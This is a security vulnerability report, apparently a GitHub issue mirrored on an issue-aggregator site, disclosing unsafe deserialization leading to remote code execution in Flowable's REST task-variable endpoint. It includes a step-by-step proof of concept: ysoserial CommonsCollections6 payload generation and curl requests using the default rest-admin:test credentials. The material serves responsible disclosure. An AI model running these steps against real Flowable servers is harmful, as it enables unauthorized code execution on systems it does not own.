[SECURITY] Deserialization RCE via TaskVariableCollectionResource multipart endpoint with type=serializable (CWE-502, CVSS 8.8)
还没有人认领这个 Issue。
评估
调研方向
Read TaskVariableCollectionResource.java:124-130 and TaskVariableBaseResource.java:123-187, then trace the multipart request through type validation to ObjectInputStream.readObject(). Use the reported multipart request only in an isolated test environment and inspect how serializable variables are configured. Done means the endpoint safely handles the reported input without unrestricted deserialization, with regression coverage for the affected path.
由索引模型根据 Issue 内容生成。
描述
Security Vulnerability Report -- CWE-502
Summary
The TaskVariableCollectionResource's multipart/form-data endpoint directly deserializes user-uploaded file content via ObjectInputStream.readObject() without any class whitelist filtering, allowing an authenticated user to achieve remote code execution (RCE) by crafting malicious serialized objects.
Vulnerability Description
Affected Repository: https://github.com/flowable/flowable-engine
Branch: main
Commit: 74fdb349c134e96e1f10592020ccca6e2e4b85f0
Static Analysis Report
Vulnerability Overview
The POST /runtime/tasks/{taskId}/variables endpoint supports uploading binary/serializable variables via multipart/form-data. When the request parameter type=serializable, the server directly uses java.io.ObjectInputStream.readObject() to deserialize the uploaded file, without applying any class whitelist/blacklist filtering. Under the default configuration rest.variables.allow.serializable=true, an authenticated attacker can upload malicious serialized payloads (such as CommonsCollections gadget chains) to achieve remote code execution.
Exploitation Prerequisites
| Condition | Description |
|---|---|
| Authentication | Requires HTTP Basic authentication, and user must have rest-api privilege (default flowable.rest.app.authentication-mode=verify-privilege) |
| Network Reachability | Intranet/public network (depending on deployment) |
| Input Constraints | Need to know a valid taskId |
| Business Prerequisites | None |
| Configuration Dependency | rest.variables.allow.serializable=true (default configuration, see flowable-default.properties:57) |
Trigger Location
TaskVariableBaseResource.java:182-186
} else if (isSerializableVariableAllowed) {
// Try deserializing the object
ObjectInputStream stream = new ObjectInputStream(file.getInputStream());
Object value = stream.readObject(); // <--- unsafe deserialization
setVariable(task, variableName, value, scope, isNew);
stream.close();
Data Flow Overview
HTTP POST /runtime/tasks/{taskId}/variables (multipart/form-data)
params: name=testVar, type=serializable, [email protected]
↓
TaskVariableCollectionResource.createTaskVariable (TaskVariableCollectionResource.java:124)
↓
request instanceof MultipartHttpServletRequest → true
↓
setBinaryVariable(request, task, true) (TaskVariableBaseResource.java:123)
↓
variableType = request.getParameterMap()["type"][0] → "serializable"
↓
file = request.getFile(first key) → MultipartFile
↓
ObjectInputStream(file.getInputStream()).readObject() (TaskVariableBaseResource.java:184-185) [SINK]
Data Flow Detailed Code Analysis
Layer 1: Entry Controller
- file:
TaskVariableCollectionResource.java:124-130 - External input:
taskId(PathVariable),request(HttpServletRequest) - Operation: Gets Task object, checks if request is multipart
- Passed to next layer:
setBinaryVariable((MultipartHttpServletRequest) request, task, true)
Layer 2: Task Retrieval (no access control)
- file:
TaskBaseResource.java:595-601 - Operation:
taskService.createTaskQuery().taskId(taskId).singleResult()— no permission check
Layer 3: setBinaryVariable — parameter extraction
- file:
TaskVariableBaseResource.java:123-156 - Operation: Extracts
name,type,scopeparameters from multipart form, gets first uploaded file
Layer 4: Type validation
- file:
TaskVariableBaseResource.java:164-167 - Operation: Validates variableType must be
binaryorserializable, no security filtering
Layer 5: Deserialization Sink
- file:
TaskVariableBaseResource.java:182-187 - External input:
file.getInputStream()— user-uploaded file raw byte stream - Operation:
new ObjectInputStream(file.getInputStream()).readObject()— direct deserialization, no class filtering
CVSS Breakdown
CVSS v3.1 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 8.8
| Vector | Value | Reason |
|---|---|---|
| AV (Attack Vector) | N (Network) | REST API accessible via network |
| AC (Attack Complexity) | L (Low) | Only needs to construct multipart request and upload serialized payload |
| PR (Privileges Required) | L (Low) | Requires authenticated user with rest-api privilege |
| UI (User Interaction) | N (None) | No user interaction required |
| S (Scope) | U (Unchanged) | Impact limited to Flowable application itself |
| C (Confidentiality) | H (High) | RCE can fully read application data and config |
| I (Integrity) | H (High) | RCE can modify arbitrary data, deploy malicious process definitions |
| A (Availability) | H (High) | RCE can cause complete service unavailability |
PoC Verification Report
Flowable REST TaskVariable ObjectInputStream Deserialization RCE
Vulnerability Summary
- Vulnerability Name: TaskVariableCollectionResource multipart/form-data unsafe deserialization RCE
- Affected Component/Port: Flowable REST API (flowable-rest-7.1.0.war), port 8080
- Vulnerability Description: The
POST /runtime/tasks/{taskId}/variablesendpoint directly usesObjectInputStream.readObject()to deserialize uploaded file content when receivingmultipart/form-datarequests withtype=serializable, without any class whitelist filtering. An authenticated attacker can upload malicious serialized objects generated by tools like ysoserial to achieve remote code execution. - Root Cause Code Snippet:
// TaskVariableBaseResource.java:182-187
} else if (isSerializableVariableAllowed) {
ObjectInputStream stream = new ObjectInputStream(file.getInputStream());
Object value = stream.readObject(); // no class whitelist filtering
setVariable(task, variableName, value, scope, isNew);
stream.close();
}
- Brief Data Flow:
HTTP POST multipart/form-data (type=serializable, [email protected])
↓
TaskVariableCollectionResource.createTaskVariable (TaskVariableCollectionResource.java:124)
↓
setBinaryVariable(request, task, true) (TaskVariableBaseResource.java:123)
↓
type validation: "serializable" passes (TaskVariableBaseResource.java:164-167)
↓
new ObjectInputStream(file.getInputStream()).readObject() (TaskVariableBaseResource.java:185) [SINK]
↓
gadget chain triggers → Runtime.exec() → RCE
Exploitation Conditions
| Condition | Description |
|---|---|
| Authentication | Requires HTTP Basic Auth (any valid user, default rest-admin:test) |
| Network Reachability | Intranet/public network (REST API port 8080 reachable) |
| Configuration Dependency | Exploitable with default config (rest.variables.allow.serializable=true) |
| Other Prerequisites | Need a valid taskId (can be enumerated via /runtime/tasks endpoint) |
Exploitation Chain Progress
| Chain Stage | Location (file:line) | Status | Evidence / Description |
|---|---|---|---|
| Entry | TaskVariableCollectionResource.java:124 | Reachable | POST multipart request successfully entered createTaskVariable |
| Parameter extraction | TaskVariableBaseResource.java:142-156 | Reached | name=testVar, type=serializable extracted from multipart form |
| Type validation | TaskVariableBaseResource.java:164-167 | Passed | type="serializable" passes binary/serializable validation |
| Sink | TaskVariableBaseResource.java:184-185 | Triggered | ObjectInputStream.readObject() deserialization executed, CC6 gadget chain triggered Runtime.exec() |
| Conclusion | — | Full Chain Closed | RCE successful, server created files /tmp/poc_entry_0658 and /tmp/poc_entry_0658_h2 |
Exploitation Verification
Step 1: Obtain valid taskId
curl -s -u rest-admin:test 'http://localhost:8080/flowable-rest/service/runtime/tasks?size=1' | python3 -c "import sys,json; print(json.load(sys.stdin)['data'][0]['id'])"
Actual execution result: returned taskId d89ce83e-8fff-11f1-a444-02423661ba3a (can also use existing tasks).
Step 2: Generate ysoserial CommonsCollections6 payload
Flowable WAR's classpath contains commons-collections-3.2.2.jar, CC6 gadget chain can be used. Server runs JDK 17, need to add --add-opens parameters to generate payload:
java --add-opens java.base/java.util=ALL-UNNAMED \
--add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658' > payload.ser
Actual execution result: Generated 1298-byte serialized payload file payload.ser.
Step 3: Send malicious multipart request to trigger deserialization (end-to-end attack command)
curl -s -u rest-admin:test \
-X POST \
-H "Content-Type: multipart/form-data" \
-F "name=testVar" \
-F "type=serializable" \
-F "[email protected]" \
"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"
Actual execution result:
- HTTP response code: 201 Created
- Response body:
{"name":"testVar","type":"serializable","value":null,"valueUrl":"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables/testVar/data","scope":"local"}
- Server filesystem verification:
ls -la /tmp/poc_entry_0658shows file was created:
-rw-r----- 1 root root 0 Aug 4 12:28 /tmp/poc_entry_0658
Step 4: Repeatability verification
Using the same method to generate a second payload touch /tmp/poc_entry_0658_h2, after sending the request also received HTTP 201 and file was successfully created:
java --add-opens java.base/java.util=ALL-UNNAMED \
--add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658_h2' > payload_h2.ser
curl -s -u rest-admin:test \
-X POST \
-F "name=testVar2" -F "type=serializable" \
-F "file=@payload_h2.ser" \
"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"
Result: HTTP 201, /tmp/poc_entry_0658_h2 file successfully created. Third repeat test /tmp/poc_entry_0658_h3 also succeeded.
Conclusion: An authenticated attacker can upload a ysoserial CommonsCollections6 gadget chain payload through the POST /runtime/tasks/{taskId}/variables endpoint, triggering ObjectInputStream.readObject() deserialization, executing arbitrary OS commands on the Flowable server with Tomcat process privileges (root). This vulnerability is exploitable under default configuration without any additional configuration changes. Three independent tests all successfully created server-side files, RCE fully confirmed.
Severity
CVSS v3.1: 8.8 (High)
Vulnerability Category: CWE-502
CVE Assignment Request
If this vulnerability is confirmed as genuine, we would be grateful if you could request a CVE ID from GitHub for this security advisory.
Even if this vulnerability no longer affects the latest version, we kindly ask whether a CVE could still be assigned for the historically affected versions, as this would assist users and organizations in identifying and remediating the issue in legacy deployments.
Thank you for your help.
- 主要语言
- Java
- 星标
- 9.6k
- 派生
- 2.9k
- 平均合并
- 1 小时 9 分钟
- 30 天内合并 PR
- 2
环境准备
- 没有 Dockerfile 或 Docker Compose 文件
- 有 Pull Request 模板
- 没有贡献指南
从这里开始
- 先读完整个 Issue,再读项目的贡献指南。
- 在 Issue 下留言说明你要接手 —— 这能避免两个人做同样的事。
- Fork 仓库,在一个分支上完成修改。
- 提交 Pull Request,并在描述里引用这个 Issue 编号。
flowable/flowable-engine 的其他 Issue
-
难度 1/5 1 小时以内 新手友好度 88/100
flowable/flowable-engine#4268 ·
-
难度 5/5 一周以上 新手友好度 30/100
flowable/flowable-engine#4293 ·
-
难度 4/5 3-5 天 新手友好度 35/100
flowable/flowable-engine#4292 ·
-
难度 4/5 3-5 天 新手友好度 48/100
flowable/flowable-engine#4290 ·
-
难度 4/5 3-5 天 新手友好度 35/100
flowable/flowable-engine#4289 ·
查看 flowable/flowable-engine 的全部 Issue
相似的 Issue
-
area/frontend good first issue kind/cooldown
难度 2/5 1-3 小时 新手友好度 78/100
维护者通常 1 天内回复
-
难度 2/5 1-3 小时 新手友好度 84/100
beehive-lab/TornadoVM#1151 ·
维护者通常 1 天内回复
-
难度 2/5 1-3 小时 新手友好度 88/100
维护者通常 1 天内回复
-
难度 2/5 1-3 小时 新手友好度 77/100
FasterXML/jackson-dataformats-binary#823 ·
维护者通常 1 天内回复
-
难度 1/5 1 小时以内 新手友好度 90/100
维护者通常 1 天内回复